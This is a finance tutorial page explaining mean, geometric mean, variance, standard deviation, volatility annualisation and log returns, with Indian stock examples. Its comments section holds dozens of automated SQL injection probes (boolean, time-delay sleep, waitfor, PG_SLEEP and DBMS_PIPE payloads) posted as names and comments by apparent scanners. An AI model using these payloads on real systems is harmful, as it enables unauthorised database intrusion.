School of Stocks
Home : Risk and Money Management

Mean, Variance, and Standard Deviation

By now, we know the basics of risk as well as the various risks that investors and traders are exposed to. Over the next few chapters, our objective is to explain various statistical ways of measuring and quantifying risk and return. In this chapter, we will focus primarily on Mean and Standard Deviation.

Abhishek Chinchalkar
20 minutes read
comment
Comments
Users learning chapter

By now, we know the basics of risk as well as the various risks that investors and traders are exposed to. In this chapter as well as in the next few, our objective is to explain various statistical ways of measuring and quantifying risk and return. In this chapter, we shall talk about:

  • Arithmetic Mean and Geometric Mean
  • Variance and Standard Deviation
  • Simple returns versus Log-based returns

Arithmetic and Geometric Mean

Mean, or average, is the most widely used measure of identifying the central point of a data set. In finance, it is primarily used for calculating the average return for a given number of observations in the data set. The most widely used form of mean, known as arithmetic mean, is calculated as follows:

arith_geo_mean.png

arith_mean_table

The above table shows the annual returns of Nifty for each of the past 23 years. To find out the average annual return of Nifty since 1999, all you need to do is add up each of the annual returns and then divide by 23. Accordingly, you would get the average annual return of Nifty since 1999 as 17.53%. You do not need to do this manually. Instead, you can solve this using the =AVERAGE() function on Microsoft Excel, as shown in the screenshot below:

geomean_table.png

Sometimes, you may be more inclined towards calculating compounded returns, especially in cases where the returns are reinvested rather than withdrawn. In such cases, geometric mean is used rather than arithmetic mean. Geometric mean can be calculated using the following formula:

geo_mean_formula.png

Manually calculating the geometric mean can be quite a dauting and time-consuming task. Hence, the best way to solve for geometric mean is using the = GEOMEAN() function on Microsoft Excel. When doing so, one should not forget to add 1 to each period return and finally subtract 1 from the output, as shown in the formula above. To understand this better, look at the below screenshot.

growth_factor_geo.png

Above, the growth factor for each period is nothing but 1 + annual return. Finally, observe the formula bar to understand how the geometric mean is calculated in cell H11. See that 1 has been subtracted from the output. So, the geometric mean or the compounded annual returns of Nifty for the past 23 years is 13.17%.

See above that the geometric mean is less than the arithmetic mean. In fact, whenever there is dispersion in data (returns in our case), the geometric mean will always be less than the arithmetic mean. Furthermore, the larger the dispersion, the larger will be the difference between arithmetic and geometric mean (former being higher than the latter). For instance, in the above case of Nifty, if you observe each of the annual returns, you will see there is quite a bit of difference over the years. As such, the arithmetic return is notably higher than the geometric return. The only instance when the two will be equal is when there is no dispersion in the data set.

Which is better: Arithmetic or Geometric Mean?

Well, that depends. If each data within a data set is not dependent on one another, arithmetic mean should be preferred. For instance, let us say that a student has scored 80% in English, 95% in Mathematics, and 90% in Science. In this case, a simple average would suffice as the individual scores are independent. Similarly, if an investor has earned a 15% return on stock A, 18% on Stock B, and 7% on stock C, arithmetic mean would suffice to calculate the average return on the three stocks (we will talk about portfolio returns in a later chapter). Arithmetic mean can also be used when dispersion between observations is relatively negligible. However, when observations within a data set are dependent on one another and the deviation between observations is anything but negligible, geometric mean should be preferred. In the world of finance, when calculating return on an investment, geometric mean is mostly preferred over arithmetic mean. This is because the returns generated between periods are correlated. Let me explain this using a simple example.

A security generated a return of +20% in the 1st year and -20% in the 2nd year. In this case, the annualized arithmetic mean return would be 0%, which would suggest that the security yielded no return over a two-year period. But is this true? Let us say that ₹100 was initially invested. This ₹100 would have amounted to ₹120 at the end of year 1 and ₹96 at the end of the year 2. So, at the end of the 2nd year, the investor would have suffered a loss of 4% on his/her invested capital of ₹100. Meanwhile, the annualized geometric mean return for the same investment would be -2.02%. See that the geometric mean reflects this loss and thereby offers a more accurate picture than the arithmetic mean. Hence, in cases where returns are reinvested, geometric mean should be preferred over arithmetic mean, as the latter tends to overestimate returns when there is dispersion in the data.

Importance of Mean in Statistics:

In statistics, mean is one of the most used metrics to calculate the center of the data set. Not only is the mean widely used by itself, but it also forms a critical part of several other statistical metrics and calculations. In finance, the mean is widely used to calculate historical returns of a security, which then forms the basis for calculating expected returns on a security as well as a portfolio. The mean is also used to compare returns between securities and assets, so as to make trading and investment choices. Further, the mean forms a critical component of measuring the distribution of security returns as well as in calculating a range of risk measurement tools. Hence, because of its widespread application in finance and statistics, it is important to have a thorough understanding of the mean as it pretty much forms the base of statistical analysis.

Before proceeding, let us consider a hypothetical situation. Let us say that over the last six months, stock A, B, and C have generated an average monthly return of 1.5%, 2%, and 1%, respectively. Based on this data, if one is looking for a trading opportunity, which of the three stocks should be selected? Well, at hindsight, it might be easy to say stock B, for the simple reason that it has generated the highest return of the three stocks. Well, this is not necessarily true. Always keep in mind that returns represent only one half of the trade. The other half is represented by risk. Without knowing what the risk is, a conclusion should not be reached. Hence, before choosing one of the three stocks based on historical returns, one must see how the returns have fluctuated (risk) in the past. The most common way to do this is to measure standard deviation, which is the topic of discussion in the next section.

Variance and Standard Deviation:

In the previous section, we talked about mean return, which is also the realized historical return of a security. We spoke about how arithmetic and geometric mean help us in calculating average returns, be it on an annualized basis or on any other basis. However, keep in mind that mean return does not show the complete picture. It tells nothing about the degree to which the returns vary over time. To understand this, let us go back to the previous example. If you look at the table, you will see that Nifty has generated a mean annual return of 17.53% over the past 23 years. However, if you closely observe, you will notice that the returns each year have fluctuated substantially from as low as -52% to as high as +76%. Because the returns are volatile, there is an element of uncertainty and risk involved.

The variability in returns, which is nothing but risk, can be measured by a few statistical tools, one of which is variance and standard deviation. Variance is used to measure the average dispersion in the data set around a central value - the mean. In other words, variance shows how far the observations are scattered around the mean. The farther the observations are from the mean, the larger will be the variance (and therefore volatility), and vice versa. Statistically, variance is the average of the squared distance between each observation and the mean, whereas standard deviation is the square root of variance. This may sound a little intimidating, but it is not. Let us simplify this by showing the steps that are involved in the calculation of variance and standard deviation of the returns of a security:

  • Step 1: Calculate the stock return for each data point
  • Step 2: Calculate the mean of the values arrived in step 1
  • Step 3: Calculate the difference between each observation arrived in step 1 and the mean arrived in step 2
  • Step 4: Square each of the differences arrived in the step 3
  • Step 5: Calculate the total of the squared differences arrived in step 4
  • Step 6: Divide the total arrived in step 5 by (n – 1)

The figure that is arrived in step 6 is the sample variance. To calculate the population variance, you will have to divide the figure arrived in step 5 by just ‘n’ and not ‘n-1’. That said, in most of the cases, because a sample is used to represent the population, sample variance is calculated rather than population variance. Going one step further will yield standard deviation, as shown below:

sdvarience.png

Let us now understand the calculation of variance and standard deviation using a hypothetical example. For our purpose, we will calculate variance and standard deviation of the returns of stock XYZ over the past 10 sessions.

hypothetical_ex.png

  • Step 1: Calculate the percent change of each data. In the example above, we will calculate the percent price change of each session using the formula: {(Current day price ÷ Previous day price) – 1} *100. The results have been shown in Column 3 of the above table.
  • Step 2: Calculate the average of all the observations arrived at in step 1. In our case, the average return turns out to be 1.57%.
  • Step 3: Calculate the difference between each observation (xi) arrived in step 1 and the mean (X) arrived in step 2. The results (xi-X) have been shown in Column 4 of the above table.
  • Step 4: Square each of the differences arrived in step 3. The results have been shown in Column 5 of the above table.
  • Step 5: Calculate the sum of all squared observations that were arrived in step 4. In our case, this value turns out to be 1.6834%.
  • Step 6: Divide the value arrived in step 5 by 9 (number of observations – 1) to calculate the sample variance. In our case, the sample variance turns out to be 0.1870%.
  • Step 7: Finally, calculate the standard deviation by taking the square root of variance. In our case, standard deviation turns out to be 4.3249%.

So, this is how variance and standard deviation are calculated. The steps involved are quite simple, but the calculation is cumbersome and time consuming. The good news is you do not need to perform so many steps. Instead, Microsoft Excel can do all the hard work for you. All you need is do is:

  • Download data of historical prices for the period for which you are looking to calculate variance and standard deviation (You could download from NSE, BSE, or Yahoo Finance).
  • Calculate the percent change of each period.
  • Finally, calculate the standard deviation using the =STDEV function (If you are also interested in calculating variance, use the =VAR() function).

how_sd_calculation.png

In the image above, see the formula bar to understand how standard deviation has been calculated in cell C13. So, the mean return of this security over the past 10 days is 1.57% while the standard deviation is 4.32%. What this tells us is that over the past 10 days, the average deviation, or the average distance, of returns from the mean is 4.32%. In isolation, standard deviation may not provide much information about volatility. However, when compared with that of other securities, standard deviation will shed a lot of information about the past volatility.

So far, we have based our calculation of variance and standard deviation on returns (i.e., percent change in price). However, variance and standard deviation can be calculated on absolute price also. In the case of the above example, if the calculations are done based on the price itself (and not returns), the mean would be ₹110.9, variance would be 54.99, and standard deviation would be ₹7.42.

Annualizing Standard Deviation:

Above, we calculated the standard deviation of returns based on the daily closing price. So, the figure that we arrived at was the standard deviation of daily returns (based on the past 10 sessions). In other words, we arrived at the 1-day standard deviation for the past 10 sessions. However, standard deviation is generally expressed in annualized terms. So, what if we wanted to convert the standard deviation based on daily returns to annualized standard deviation? Could we do it? Well, the answer is yes. To convert standard deviation based on daily returns to annualised standard deviation, we can use the following formula:

annuali.zed_mu.png

In the above equation, 250 represents the approximate number of trading sessions in a year. In a similar way, if returns are based on weekly prices, the number inside the square root in the above equation would be 52; if they are based on monthly prices, the number inside the square root would be 12; if they are based on quarterly prices, the number inside the square root would be 4; and if they are based on semi-annual prices, the number inside the square root would be 2.

So, coming back to our previous example of stock XYZ, the standard deviation was 4.3249%. This is the standard deviation based on daily returns. Using the above formula, the annualized standard deviation turns out to be 68.38% (=4.3249*SQRT(250)).

On the other hand, what if you instead had annualized standard deviation and wanted to convert it to, say, daily standard deviation? In that case, you would manipulate the above formula as follows:

day_returns.png

In the above case, to convert annualized volatility of 68.3822% to daily volatility, you would perform the following calculation in Excel: =68.3822÷SQRT(250)

Simple returns versus lognormal returns:

In the hypothetical example of stock XYZ that we spoke about earlier in this chapter, we calculated standard deviation of stock returns based on simple returns. That is, we calculated the return for each period using the formula mentioned below and then took the average of those returns:

returns_on_day.png

However, simple return has an inherent problem as shown in the illustration below:

security_price.png

In the above image, see that the security price has risen 20% at the end of the 1st period and then declined 20% at the end of the 2nd period. Calculating the average of these returns generates a mean return of 0%, which kind of suggests that the investor has neither made money nor lost money. However, if you closely notice, the investor has realized a loss of 4%. See that if ₹100 was invested at the start of the period, it would be worth ₹96 at the end of the 2nd period. This is the issue posed by simple return because it does not take into consideration the effects of continuous compounding. As such, it tends to overestimate the returns. Logarithmic return, on the other hand, takes continuous compounding into its calculation. Look at the image below to understand this:

return_on_day_t.png

See cell J26 and then focus on the formula bar to understand how the log return is calculated for each period. It is calculated on Microsoft Excel using the following function:

return_on_day_t_formula.png

In the above expression, LN stands for the function, natural log. The log returns of each period can be summed to figure out the overall log return, something which cannot be done in case of simple returns. For instance, the overall log return for the above example can be solved as =LN(96/100), which turns out to be -4.08%. This gives the same result as adding the log returns for period 1 (18.23%) and 2 (-22.31%). However, with simple return, see above that adding +20% and -20% results in 0, while calculating the overall simple return over 2 periods results in -4% (((96÷100)-1)*100). Also, log values are more suitable when measuring changes in a variable that follows normal distribution. As it is generally assumed that stock returns tend to follow normal distribution, log values are hence more appropriate. It is because of these reasons that standard deviation of stock returns must be based on log returns rather than simple returns. We will talk about normal distribution in the next chapter. Let us now go back to our earlier example of stock XYZ and calculate standard deviation based on log returns.

sd_using_ef.png

In the above example, notice that the log returns are calculated for each period rather than simple returns, using the Excel function =LN(). The standard deviation is then calculated in cell C28, as can be seen in the formula bar above. Using log returns, the standard deviation turned out to be 4.2558%, as compared to 4.3249% that was the case when simple returns were used. Do keep in mind that this is the daily standard deviation. To calculate the annualized standard deviation, you need to multiply the daily standard deviation with the square root of 250. In this case, the annualized standard deviation turns out to be 67.2895%.

Let us conclude this discussion by highlighting the results in the table below:

sigma_based_formula.png

Real world application of Standard Deviation on stocks:

Now that we have understood how to calculate standard deviation, let us take a real-world example. Let us take four stocks - two from the IT sector (Infosys and TCS) and two from the metal sector (Tata Steel and Hindalco). Let us calculate the volatility of each of these stocks for 2019 and 2020. To do so, perform the following:

  • Download the daily historical data of each stock from 31st Dec 2018 till 31st Dec 2020. You could download the same from the BSE website, the NSE website, or from Yahoo Finance (Click here to download historical stock data from BSE, click here to download historical index data from BSE, and click here to download historical index data from NSE)
  • Once you have downloaded the data, calculate the log daily return of each stock for both 2019 and 2020 (ensure that the data is in ascending order, date-wise)
  • Calculate the mean and standard deviation based on the log daily return values
  • Also calculate the annualised mean and standard deviation from the respective daily mean and standard deviation values

The statistics are as mentioned in each of the tables below, with the table on the top representing the statistics for 2019 while that at the bottom representing the statistics for 2020.

daily_annaualised_table.png

You may wonder, how did we calculate the annualized mean in each of the above tables. Well, because we already had the log-based return for the entire year (both 2019 and 2020), the annualized mean was calculated as the summation of all the log returns for each of the four securities and for each period. Remember from our earlier discussion, log returns can be summed.

If you go through the above tables, you will see that the two IT stocks exhibited less deviation from the mean return than did the two metal stocks in each of the past two years, more so in 2020. In other words, IT stocks were less volatile than metal stocks during the stated period.

Knowing historical volatility can help a trader or an investor in choosing the right securities for trading or investing depending on his/her risk profile and objectives. Typically, a conservative trader or investor would be more inclined towards choosing securities that exhibit less volatility, so as to reduce exposure to risks. On the other hand, an aggressive trader or investor could be more comfortable choosing stocks that exhibit high volatility, as high volatility also means the possibility of earning higher-than-average returns.

As a side note, before we conclude this chapter, let us quickly understand how to convert daily return to annualized return. What if the average daily return of a security, say for the month of March, is 0.05% and you want to annualize it? How would you do that?

Well, you could do so using the below formula:

annualization_return_two.png

So, inputting 0.05% in the above equation, we get annualized return as 13.31%. Similarly, to calculate the quarterly return based out of the daily mean return, replace 250 in the above formula with 63 (because there are approximately 63 trading days in a quarter); to calculate the monthly return based out of the daily mean return, replace 250 with 21 (because there are approximately 21 trading days in a month), and so on.

Importance of Standard Deviation in Finance:

In finance, standard deviation is one of the most widely used metric to measure risk. It enables traders and investors to understand how volatile a security has been over the period under consideration. A high standard deviation tells that there has been a larger deviation in the returns of a security from its mean return, while a low standard deviation tells that there has been less deviation in the returns of a security from its mean return.

Keep in mind that a high standard deviation is not necessarily bad, just as a low standard deviation is not necessarily good. Instead, it all depends on the risk appetite and reward expectations of traders and investors. A trader or an investor who has a higher risk appetite and reward expectations would be happy to deploy funds in securities that exhibit high standard deviation. On the other hand, a trader or an investor who has a lower risk appetite would prefer deploying funds in securities that exhibit low standard deviation. Always keep in mind, higher the standard deviation, higher would be the risk but so would be the reward potential, and vice versa.

Furthermore, standard deviation and volatility can also be used to determine the extent of stop losses for a trade. We will talk more about this in a later chapter.

Things to keep in mind about Standard Deviation (σ):

Standard deviation is a tool that is very widely used not only by itself but also as a part of other metrics used to measure individual and portfolio risks. We will continue talking about standard deviation over the next few chapters.

Let us wrap up this chapter by highlighting the key properties of standard deviation:

  • σ is the most used metric to measure risk in an investment (or a trade)
  • σ can be either positive or zero, but can never be negative
  • A σ of zero means there is no dispersion in the data set
  • A σ greater than zero means there is dispersion in the data set
  • The higher the σ, the higher the volatility and therefore risk, and vice versa
  • σ is expressed in the same unit as the mean. As a result, it is a more widely used metric than variance
  • Because σ utilizes mean in its calculation, it is heavily influenced by outliers
  • In finance, σ can be calculated based not only on price returns but on absolute price as well
  • σ of stock returns must ideally be calculated on lognormal returns rather than simple returns
  • σ can be compared across securities, such as stocks, sectors, indices etc.
  • Usually, blue chip stocks tend to have low σ as compared to midcap or smallcap stocks

Next Chapter

Returns Distribution, Skewness, and Kurtosis

3 Lessons

In this chapter, we will carry forward our discussion from the previous chapter and talk about the normal distribution, how to identify potential future range based on mean and standard deviation, and the concepts of skewness and kurtosis.

Covariance and Correlation

4 Lessons

In this chapter, we will talk about Covariance and Correlation, two tools that are widely used in statistical analysis and portfolio management to measure the relationship between two securities and diversify the portfolio to reduce risks.

Comments & Discussions in

FYERS Community Learn More...

Responses

wUmrLVWz commented on March 30th, 2022 at 4:18 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:48 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:48 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:49 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:50 PM  
555


-1 OR 2+281-281-1=0+0+0+1 -- commented on March 30th, 2022 at 4:50 PM  
555


-1 OR 2+269-269-1=0+0+0+1 commented on March 30th, 2022 at 4:50 PM  
555


-1' OR 2+543-543-1=0+0+0+1 -- commented on March 30th, 2022 at 4:50 PM  
555


-1' OR 2+195-195-1=0+0+0+1 or 'QeA7D4jU'=' commented on March 30th, 2022 at 4:50 PM  
555


-1" OR 2+873-873-1=0+0+0+1 -- commented on March 30th, 2022 at 4:50 PM  
555


if(now()=sysdate(),sleep(15),0) commented on March 30th, 2022 at 4:50 PM  
555


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z commented on March 30th, 2022 at 4:50 PM  
555


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z commented on March 30th, 2022 at 4:50 PM  
555


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ commented on March 30th, 2022 at 4:50 PM  
555


1 waitfor delay '0:0:15' -- commented on March 30th, 2022 at 4:50 PM  
555


0L35VENs'; waitfor delay '0:0:15' -- commented on March 30th, 2022 at 4:50 PM  
555


vIebw3Qs' OR 841=(SELECT 841 FROM PG_SLEEP(15))-- commented on March 30th, 2022 at 4:50 PM  
555


JVWiOmtX') OR 26=(SELECT 26 FROM PG_SLEEP(15))-- commented on March 30th, 2022 at 4:50 PM  
555


sCycmBZ8')) OR 252=(SELECT 252 FROM PG_SLEEP(15))-- commented on March 30th, 2022 at 4:50 PM  
555


wUmrLVWz'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' commented on March 30th, 2022 at 4:51 PM  
555


1'" commented on March 30th, 2022 at 4:51 PM  
555


@@LjcbV commented on March 30th, 2022 at 4:51 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1 OR 2+727-727-1=0+0+0+1 --


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1 OR 2+756-756-1=0+0+0+1


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1' OR 2+637-637-1=0+0+0+1 --


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1' OR 2+989-989-1=0+0+0+1 or 'kflraukG'='


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1" OR 2+167-167-1=0+0+0+1 --


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
if(now()=sysdate(),sleep(15),0)


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1; waitfor delay '0:0:15' --


wUmrLVWz commented on March 30th, 2022 at 4:51 PM  
-1); waitfor delay '0:0:15' --


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
1 waitfor delay '0:0:15' --


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
bVpFSgVQ'; waitfor delay '0:0:15' --


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
-5 OR 772=(SELECT 772 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
-5) OR 514=(SELECT 514 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
-1)) OR 609=(SELECT 609 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
zd9HI4Bz' OR 732=(SELECT 732 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
7KHBKECm') OR 779=(SELECT 779 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
uPp5kKhc')) OR 720=(SELECT 720 FROM PG_SLEEP(15))--


wUmrLVWz commented on March 30th, 2022 at 4:52 PM  
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
1'"


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
@@vILV5


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:53 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:54 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:55 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:56 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:57 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:57 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:59 PM  
555


wUmrLVWz commented on March 30th, 2022 at 4:59 PM  
555


wUmrLVWz commented on March 30th, 2022 at 5:30 PM  
555


wrBEIRqX commented on November 9th, 2023 at 7:47 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:42 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:43 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:50 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:50 PM  
555


-1 OR 2+295-295-1=0+0+0+1 -- commented on November 9th, 2023 at 8:50 PM  
555


-1 OR 2+937-937-1=0+0+0+1 commented on November 9th, 2023 at 8:50 PM  
555


-1' OR 2+815-815-1=0+0+0+1 -- commented on November 9th, 2023 at 8:50 PM  
555


-1' OR 2+173-173-1=0+0+0+1 or '4v9AjHxk'=' commented on November 9th, 2023 at 8:50 PM  
555


-1" OR 2+686-686-1=0+0+0+1 -- commented on November 9th, 2023 at 8:50 PM  
555


if(now()=sysdate(),sleep(15),0) commented on November 9th, 2023 at 8:51 PM  
555


0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z commented on November 9th, 2023 at 8:51 PM  
555


0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z commented on November 9th, 2023 at 8:52 PM  
555


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ commented on November 9th, 2023 at 8:52 PM  
555


1 waitfor delay '0:0:15' -- commented on November 9th, 2023 at 8:53 PM  
555


3pTSEhJy'; waitfor delay '0:0:15' -- commented on November 9th, 2023 at 8:54 PM  
555


Aiu32lYX' OR 30=(SELECT 30 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 8:54 PM  
555


ryd2fHkM') OR 748=(SELECT 748 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 8:55 PM  
555


nrYIYGag')) OR 329=(SELECT 329 FROM PG_SLEEP(15))-- commented on November 9th, 2023 at 8:55 PM  
555


wrBEIRqX'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' commented on November 9th, 2023 at 8:56 PM  
555


1'" commented on November 9th, 2023 at 8:56 PM  
555


@@PE2xP commented on November 9th, 2023 at 8:56 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
555


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
-1 OR 2+367-367-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
-1 OR 2+453-453-1=0+0+0+1


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
-1' OR 2+156-156-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
-1' OR 2+860-860-1=0+0+0+1 or 'c9QLpPlx'='


wrBEIRqX commented on November 9th, 2023 at 8:57 PM  
-1" OR 2+271-271-1=0+0+0+1 --


wrBEIRqX commented on November 9th, 2023 at 8:58 PM  
if(now()=sysdate(),sleep(15),0)


wrBEIRqX commented on November 9th, 2023 at 8:58 PM  
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


wrBEIRqX commented on November 9th, 2023 at 8:59 PM  
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


wrBEIRqX commented on November 9th, 2023 at 8:59 PM  
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


wrBEIRqX commented on November 9th, 2023 at 9:00 PM  
-1; waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 9:00 PM  
-1); waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 9:01 PM  
1 waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 9:02 PM  
X8K2oarn'; waitfor delay '0:0:15' --


wrBEIRqX commented on November 9th, 2023 at 9:02 PM  
-5 OR 136=(SELECT 136 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:03 PM  
-5) OR 900=(SELECT 900 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:03 PM  
-1)) OR 34=(SELECT 34 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:04 PM  
rEwDU687' OR 829=(SELECT 829 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:04 PM  
MIIsJNnh') OR 300=(SELECT 300 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:05 PM  
6DGigVtU')) OR 684=(SELECT 684 FROM PG_SLEEP(15))--


wrBEIRqX commented on November 9th, 2023 at 9:06 PM  
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


wrBEIRqX commented on November 9th, 2023 at 9:06 PM  
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


wrBEIRqX commented on November 9th, 2023 at 9:06 PM  
1'"


wrBEIRqX commented on November 9th, 2023 at 9:06 PM  
@@Faoca


wrBEIRqX commented on November 9th, 2023 at 9:07 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:07 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:07 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:07 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:07 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:08 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:08 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:08 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:09 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:09 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:10 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:11 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:11 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:12 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:13 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:13 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:14 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:14 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:14 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:14 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:15 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


wrBEIRqX commented on November 9th, 2023 at 9:16 PM  
555


